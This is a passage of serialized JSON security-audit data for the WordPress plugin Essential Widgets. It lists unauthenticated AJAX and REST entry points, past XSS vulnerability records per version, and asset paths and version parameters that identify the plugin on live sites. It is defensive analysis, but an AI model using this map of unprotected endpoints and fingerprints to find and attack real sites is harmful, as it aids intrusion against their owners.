me":256,"callback":257,"file":258,"line":259},"widgets_init","ew_archives_register","includes\\widgets\\class-ew-archives.php",244,{"type":171,"name":256,"callback":261,"file":262,"line":263},"ew_authors_register","includes\\widgets\\class-ew-authors.php",383,{"type":171,"name":256,"callback":265,"file":266,"line":267},"ew_categories_register","includes\\widgets\\class-ew-categories.php",419,{"type":171,"name":256,"callback":269,"file":270,"line":271},"ew_menu_register","includes\\widgets\\class-ew-menus.php",332,{"type":171,"name":256,"callback":273,"file":274,"line":275},"ew_pages_register","includes\\widgets\\class-ew-pages.php",435,{"type":171,"name":256,"callback":277,"file":278,"line":279},"ew_posts_register","includes\\widgets\\class-ew-posts.php",333,{"type":171,"name":256,"callback":281,"file":282,"line":283},"ew_tags_register","includes\\widgets\\class-ew-tags.php",461,[285,289,292,295,297],{"action":286,"nopriv":50,"callback":286,"hasNonce":287,"hasCapCheck":287,"file":174,"line":288},"ew_switch",true,52,{"action":290,"nopriv":50,"callback":291,"hasNonce":287,"hasCapCheck":287,"file":194,"line":160},"query-themes","wp_ajax_custom_query_themes",{"action":293,"nopriv":50,"callback":294,"hasNonce":287,"hasCapCheck":287,"file":194,"line":252},"customize_load_themes","handle_load_themes_request",{"action":286,"nopriv":50,"callback":212,"hasNonce":50,"hasCapCheck":50,"file":213,"line":296},169,{"action":298,"nopriv":50,"callback":298,"hasNonce":287,"hasCapCheck":287,"file":235,"line":299},"ctp_switch",97,[301,309,314],{"namespace":302,"route":303,"methods":304,"callback":306,"permissionCallback":307,"file":240,"line":308},"ew-rest\u002Fv1","ew-menu-list",[305],"GET","ew_menu_list","__return_true",128,{"namespace":302,"route":310,"methods":311,"callback":312,"permissionCallback":307,"file":243,"line":313},"ew-page-list",[305],"ew_page_list",211,{"namespace":302,"route":315,"methods":316,"callback":317,"permissionCallback":307,"file":246,"line":318},"ew-post-list",[305],"ew_post_list",108,[320,325,330,335,339,343,346],{"tag":321,"callback":322,"file":323,"line":324},"ew-archive","ew_archive_render_shortcode","includes\\ew-block\\blocks\\ew-archive\\index.php",60,{"tag":326,"callback":327,"file":328,"line":329},"ew-author","ew_author_render_shortcode","includes\\ew-block\\blocks\\ew-author\\index.php",84,{"tag":331,"callback":332,"file":333,"line":334},"ew-category","ew_category_render_shortcode","includes\\ew-block\\blocks\\ew-category\\index.php",104,{"tag":336,"callback":337,"file":240,"line":338},"ew-menu","ew_menu_render_shortcode",77,{"tag":340,"callback":341,"file":243,"line":342},"ew-page","ew_page_render_shortcode",101,{"tag":344,"callback":345,"file":246,"line":191},"ew-post","ew_post_render_shortcode",{"tag":347,"callback":348,"file":349,"line":350},"ew-tags","ew_tags_render_shortcode","includes\\ew-block\\blocks\\ew-tags\\index.php",120,[],4,{"dangerousFunctions":354,"sqlUsage":355,"outputEscaping":357,"fileOperations":28,"externalRequests":28,"nonceChecks":352,"capabilityChecks":71,"bundledLibraries":372},[],{"prepared":28,"raw":28,"locations":356},[],{"escaped":358,"rawEcho":359,"locations":360},768,6,[361,365,366,367,369,371],{"file":362,"line":363,"context":364},"admin\\partials\\essential-widgets-admin-display.php",47,"raw output",{"file":362,"line":288,"context":364},{"file":270,"line":308,"context":364},{"file":270,"line":368,"context":364},141,{"file":270,"line":370,"context":364},154,{"file":270,"line":222,"context":364},[],[],{"summary":375,"deductions":376},"The Essential Widgets plugin v3.0.1 exhibits a mixed security posture. On the positive side, the plugin demonstrates strong adherence to secure coding practices with 100% of SQL queries using prepared statements, an exceptionally high rate of output escaping (99%), and a notable absence of dangerous functions, file operations, and external HTTP requests. The presence of nonce and capability checks across a good portion of its entry points is also commendable. However, significant security concerns arise from the unprotected entry points. The analysis reveals 4 unprotected entry points, specifically 1 AJAX handler and 3 REST API routes, which represent direct avenues for potential exploitation if not properly secured. The vulnerability history, while currently showing no unpatched CVEs, does indicate a past pattern of medium-severity vulnerabilities, particularly Cross-site Scripting (XSS), which is a significant concern. The last recorded vulnerability date is also in the future, which requires careful consideration and may indicate a data discrepancy or a projection of future risks. Overall, while the plugin has good foundational security practices, the unprotected entry points and past XSS vulnerabilities necessitate a cautious approach and prompt remediation.",[377,380,383],{"reason":378,"points":379},"AJAX handler without authentication check",7,{"reason":381,"points":382},"REST API routes without permission callbacks",9,{"reason":384,"points":359},"Past medium-severity vulnerabilities (2 CVEs)","2026-03-16T17:39:48.047Z",{"wat":387,"direct":403},{"assetPaths":388,"generatorPatterns":392,"scriptPaths":393,"versionParams":397},[389,390,391],"\u002Fwp-content\u002Fplugins\u002Fessential-widgets\u002Fadmin\u002Fcss\u002Fessential-widgets-dasbhoard-admin.css","\u002Fwp-content\u002Fplugins\u002Fessential-widgets\u002Fadmin\u002Fcss\u002Fadmin-dashboard.css","\u002Fwp-content\u002Fplugins\u002Fessential-widgets\u002Fincludes\u002Few-block\u002Fbuild\u002Findex.asset.php",[],[394,395,396],"\u002Fwp-content\u002Fplugins\u002Fessential-widgets\u002Fadmin\u002Fjs\u002Fessential-widgets-admin.js","\u002Fwp-content\u002Fplugins\u002Fessential-widgets\u002Fadmin\u002Fjs\u002Fessential-widgets-dashboard.js","\u002Fwp-content\u002Fplugins\u002Fessential-widgets\u002Fincludes\u002Few-block\u002Fbuild\u002Findex.js",[398,399,400,401,402],"essential-widgets-dasbhoard-admin.css?ver=","admin-dashboard.css?ver=","essential-widgets-admin.js?ver=","essential-widgets-dashboard.js?ver=","index.js?ver=",{"cssClasses":404,"htmlComments":412,"htmlAttributes":416,"restEndpoints":420,"jsGlobals":421,"shortcodeOutput":423},[405,406,407,408,409,410,411],"ew-switch-control","ew-switch-slider","essential-widgets-dashboard","ew-widget-list","ew-widget-item","ew-widget-control","ew-widget-label",[413,414,415],"\u003C!-- CPT tabs removal options -->","\u003C!-- Adds Catch Themes tab in Add theme page and Themes by Catch Themes in Customizer's change theme option. -->","\u003C!-- Add EW Blocks -->",[417,418,419],"data-switch-id","data-switch-type","data-switch-status",[],[422],"essential_widgets_params",[],{"error":287,"url":425,"statusCode":426,"statusMessage":427,"message":427},"http:\u002F\u002Flocalhost\u002Fapi\u002Fplugins\u002Fessential-widgets\u002Fbundle",404,"no bundle for this plugin yet",{"slug":4,"current_version":6,"total_versions":429,"versions":430},26,[431,436,443,450,459,468,477,486,495,504,513,522,531,540,549,558,567,576,585,594,603,612,621,630,639,648],{"version":6,"download_url":26,"svn_tag_url":432,"released_at":38,"has_diff":50,"diff_files_changed":433,"diff_lines":38,"trac_diff_url":434,"vulnerabilities":435,"is_current":287},"https:\u002F\u002Fplugins.svn.wordpress.org\u002Fessential-widgets\u002Ftags\u002F3.0.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fessential-widgets%2Ftags%2F3.0&new_path=%2Fessential-widgets%2Ftags%2F3.0.1",[],{"version":134,"download_url":437,"svn_tag_url":438,"released_at":38,"has_diff":50,"diff_files_changed":439,"diff_lines":38,"trac_diff_url":440,"vulnerabilities":441,"is_current":50},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-widgets.3.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fessential-widgets\u002Ftags\u002F3.0\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fessential-widgets%2Ftags%2F2.3&new_path=%2Fessential-widgets%2Ftags%2F3.0",[442],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":6},{"version":66,"download_url":444,"svn_tag_url":445,"released_at":38,"has_diff":50,"diff_files_changed":446,"diff_lines":38,"trac_diff_url":447,"vulnerabilities":448,"is_current":50},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-widgets.2.3.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fessential-widgets\u002Ftags\u002F2.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fessential-widgets%2Ftags%2F2.2.2&new_path=%2Fessential-widgets%2Ftags%2F2.3",[449],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":6},{"version":451,"download_url":452,"svn_tag_url":453,"released_at":38,"has_diff":50,"diff_files_changed":454,"diff_lines":38,"trac_diff_url":455,"vulnerabilities":456,"is_current":50},"2.2.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-widgets.2.2.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fessential-widgets\u002Ftags\u002F2.2.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fessential-widgets%2Ftags%2F2.2.1&new_path=%2Fessential-widgets%2Ftags%2F2.2.2",[457,458],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":6},{"id":61,"url_slug":62,"title":63,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":66},{"version":460,"download_url":461,"svn_tag_url":462,"released_at":38,"has_diff":50,"diff_files_changed":463,"diff_lines":38,"trac_diff_url":464,"vulnerabilities":465,"is_current":50},"2.2.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-widgets.2.2.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fessential-widgets\u002Ftags\u002F2.2.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fessential-widgets%2Ftags%2F2.2&new_path=%2Fessential-widgets%2Ftags%2F2.2.1",[466,467],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":6},{"id":61,"url_slug":62,"title":63,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":66},{"version":469,"download_url":470,"svn_tag_url":471,"released_at":38,"has_diff":50,"diff_files_changed":472,"diff_lines":38,"trac_diff_url":473,"vulnerabilities":474,"is_current":50},"2.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-widgets.2.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fessential-widgets\u002Ftags\u002F2.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fessential-widgets%2Ftags%2F2.1&new_path=%2Fessential-widgets%2Ftags%2F2.2",[475,476],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":6},{"id":61,"url_slug":62,"title":63,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":66},{"version":478,"download_url":479,"svn_tag_url":480,"released_at":38,"has_diff":50,"diff_files_changed":481,"diff_lines":38,"trac_diff_url":482,"vulnerabilities":483,"is_current":50},"2.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-widgets.2.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fessential-widgets\u002Ftags\u002F2.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fessential-widgets%2Ftags%2F2.0&new_path=%2Fessential-widgets%2Ftags%2F2.1",[484,485],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":6},{"id":61,"url_slug":62,"title":63,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":66},{"version":487,"download_url":488,"svn_tag_url":489,"released_at":38,"has_diff":50,"diff_files_changed":490,"diff_lines":38,"trac_diff_url":491,"vulnerabilities":492,"is_current":50},"2.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-widgets.2.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fessential-widgets\u002Ftags\u002F2.0\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fessential-widgets%2Ftags%2F1.9&new_path=%2Fessential-widgets%2Ftags%2F2.0",[493,494],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":6},{"id":61,"url_slug":62,"title":63,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":66},{"version":496,"download_url":497,"svn_tag_url":498,"released_at":38,"has_diff":50,"diff_files_changed":499,"diff_lines":38,"trac_diff_url":500,"vulnerabilities":501,"is_current":50},"1.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-widgets.1.9.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fessential-widgets\u002Ftags\u002F1.9\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fessential-widgets%2Ftags%2F1.8&new_path=%2Fessential-widgets%2Ftags%2F1.9",[502,503],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":6},{"id":61,"url_slug":62,"title":63,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":66},{"version":505,"download_url":506,"svn_tag_url":507,"released_at":38,"has_diff":50,"diff_files_changed":508,"diff_lines":38,"trac_diff_url":509,"vulnerabilities":510,"is_current":50},"1.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-widgets.1.8.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fessential-widgets\u002Ftags\u002F1.8\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fessential-widgets%2Ftags%2F1.7.4&new_path=%2Fessential-widgets%2Ftags%2F1.8",[511,512],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":6},{"id":61,"url_slug":62,"title":63,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":66},{"version":514,"download_url":515,"svn_tag_url":516,"released_at":38,"has_diff":50,"diff_files_changed":517,"diff_lines":38,"trac_diff_url":518,"vulnerabilities":519,"is_current":50},"1.7.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-widgets.1.7.4.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fessential-widgets\u002Ftags\u002F1.7.4\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fessential-widgets%2Ftags%2F1.7.3&new_path=%2Fessential-widgets%2Ftags%2F1.7.4",[520,521],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":6},{"id":61,"url_slug":62,"title":63,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":66},{"version":523,"download_url":524,"svn_tag_url":525,"released_at":38,"has_diff":50,"diff_files_changed":526,"diff_lines":38,"trac_diff_url":527,"vulnerabilities":528,"is_current":50},"1.7.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-widgets.1.7.3.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fessential-widgets\u002Ftags\u002F1.7.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fessential-widgets%2Ftags%2F1.7.2&new_path=%2Fessential-widgets%2Ftags%2F1.7.3",[529,530],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":6},{"id":61,"url_slug":62,"title":63,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":66},{"version":532,"download_url":533,"svn_tag_url":534,"released_at":38,"has_diff":50,"diff_files_changed":535,"diff_lines":38,"trac_diff_url":536,"vulnerabilities":537,"is_current":50},"1.7.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-widgets.1.7.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fessential-widgets\u002Ftags\u002F1.7.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fessential-widgets%2Ftags%2F1.7.1&new_path=%2Fessential-widgets%2Ftags%2F1.7.2",[538,539],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":6},{"id":61,"url_slug":62,"title":63,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":66},{"version":541,"download_url":542,"svn_tag_url":543,"released_at":38,"has_diff":50,"diff_files_changed":544,"diff_lines":38,"trac_diff_url":545,"vulnerabilities":546,"is_current":50},"1.7.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-widgets.1.7.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fessential-widgets\u002Ftags\u002F1.7.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fessential-widgets%2Ftags%2F1.7&new_path=%2Fessential-widgets%2Ftags%2F1.7.1",[547,548],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":6},{"id":61,"url_slug":62,"title":63,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":66},{"version":550,"download_url":551,"svn_tag_url":552,"released_at":38,"has_diff":50,"diff_files_changed":553,"diff_lines":38,"trac_diff_url":554,"vulnerabilities":555,"is_current":50},"1.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-widgets.1.7.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fessential-widgets\u002Ftags\u002F1.7\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fessential-widgets%2Ftags%2F1.6&new_path=%2Fessential-widgets%2Ftags%2F1.7",[556,557],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":6},{"id":61,"url_slug":62,"title":63,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":66},{"version":559,"download_url":560,"svn_tag_url":561,"released_at":38,"has_diff":50,"diff_files_changed":562,"diff_lines":38,"trac_diff_url":563,"vulnerabilities":564,"is_current":50},"1.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-widgets.1.6.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fessential-widgets\u002Ftags\u002F1.6\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fessential-widgets%2Ftags%2F1.5&new_path=%2Fessential-widgets%2Ftags%2F1.6",[565,566],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":6},{"id":61,"url_slug":62,"title":63,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":66},{"version":568,"download_url":569,"svn_tag_url":570,"released_at":38,"has_diff":50,"diff_files_changed":571,"diff_lines":38,"trac_diff_url":572,"vulnerabilities":573,"is_current":50},"1.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-widgets.1.5.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fessential-widgets\u002Ftags\u002F1.5\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fessential-widgets%2Ftags%2F1.4.1&new_path=%2Fessential-widgets%2Ftags%2F1.5",[574,575],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":6},{"id":61,"url_slug":62,"title":63,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":66},{"version":577,"download_url":578,"svn_tag_url":579,"released_at":38,"has_diff":50,"diff_files_changed":580,"diff_lines":38,"trac_diff_url":581,"vulnerabilities":582,"is_current":50},"1.4.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-widgets.1.4.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fessential-widgets\u002Ftags\u002F1.4.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fessential-widgets%2Ftags%2F1.4&new_path=%2Fessential-widgets%2Ftags%2F1.4.1",[583,584],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":6},{"id":61,"url_slug":62,"title":63,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":66},{"version":586,"download_url":587,"svn_tag_url":588,"released_at":38,"has_diff":50,"diff_files_changed":589,"diff_lines":38,"trac_diff_url":590,"vulnerabilities":591,"is_current":50},"1.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-widgets.1.4.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fessential-widgets\u002Ftags\u002F1.4\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fessential-widgets%2Ftags%2F1.3&new_path=%2Fessential-widgets%2Ftags%2F1.4",[592,593],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":6},{"id":61,"url_slug":62,"title":63,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":66},{"version":595,"download_url":596,"svn_tag_url":597,"released_at":38,"has_diff":50,"diff_files_changed":598,"diff_lines":38,"trac_diff_url":599,"vulnerabilities":600,"is_current":50},"1.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-widgets.1.3.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fessential-widgets\u002Ftags\u002F1.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fessential-widgets%2Ftags%2F1.2.2&new_path=%2Fessential-widgets%2Ftags%2F1.3",[601,602],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":6},{"id":61,"url_slug":62,"title":63,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":66},{"version":604,"download_url":605,"svn_tag_url":606,"released_at":38,"has_diff":50,"diff_files_changed":607,"diff_lines":38,"trac_diff_url":608,"vulnerabilities":609,"is_current":50},"1.2.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-widgets.1.2.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fessential-widgets\u002Ftags\u002F1.2.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fessential-widgets%2Ftags%2F1.2.1&new_path=%2Fessential-widgets%2Ftags%2F1.2.2",[610,611],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":6},{"id":61,"url_slug":62,"title":63,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":66},{"version":613,"download_url":614,"svn_tag_url":615,"released_at":38,"has_diff":50,"diff_files_changed":616,"diff_lines":38,"trac_diff_url":617,"vulnerabilities":618,"is_current":50},"1.2.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-widgets.1.2.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fessential-widgets\u002Ftags\u002F1.2.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fessential-widgets%2Ftags%2F1.2&new_path=%2Fessential-widgets%2Ftags%2F1.2.1",[619,620],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":6},{"id":61,"url_slug":62,"title":63,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":66},{"version":622,"download_url":623,"svn_tag_url":624,"released_at":38,"has_diff":50,"diff_files_changed":625,"diff_lines":38,"trac_diff_url":626,"vulnerabilities":627,"is_current":50},"1.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-widgets.1.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fessential-widgets\u002Ftags\u002F1.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fessential-widgets%2Ftags%2F1.1&new_path=%2Fessential-widgets%2Ftags%2F1.2",[628,629],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":6},{"id":61,"url_slug":62,"title":63,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":66},{"version":631,"download_url":632,"svn_tag_url":633,"released_at":38,"has_diff":50,"diff_files_changed":634,"diff_lines":38,"trac_diff_url":635,"vulnerabilities":636,"is_current":50},"1.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-widgets.1.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fessential-widgets\u002Ftags\u002F1.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fessential-widgets%2Ftags%2F1.0.1&new_path=%2Fessential-widgets%2Ftags%2F1.1",[637,638],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":6},{"id":61,"url_slug":62,"title":63,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":66},{"version":640,"download_url":641,"svn_tag_url":642,"released_at":38,"has_diff":50,"diff_files_changed":643,"diff_lines":38,"trac_diff_url":644,"vulnerabilities":645,"is_current":50},"1.0.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-widgets.1.0.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fessential-widgets\u002Ftags\u002F1.0.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fessential-widgets%2Ftags%2F1.0.0&new_path=%2Fessential-widgets%2Ftags%2F1.0.1",[646,647],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":6},{"id":61,"url_slug":62,"title":63,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":66},{"version":649,"download_url":650,"svn_tag_url":651,"released_at":38,"has_diff":50,"diff_files_changed":652,"diff_lines":38,"trac_diff_url":38,"vulnerabilities":653,"is_current":50},"1.0.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-widgets.1.0.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fessential-widgets\u002Ftags\u002F1.0.0\u002F",[],[654,655],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":6},{"id":61,"url_slug":62,"title":63,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":66}]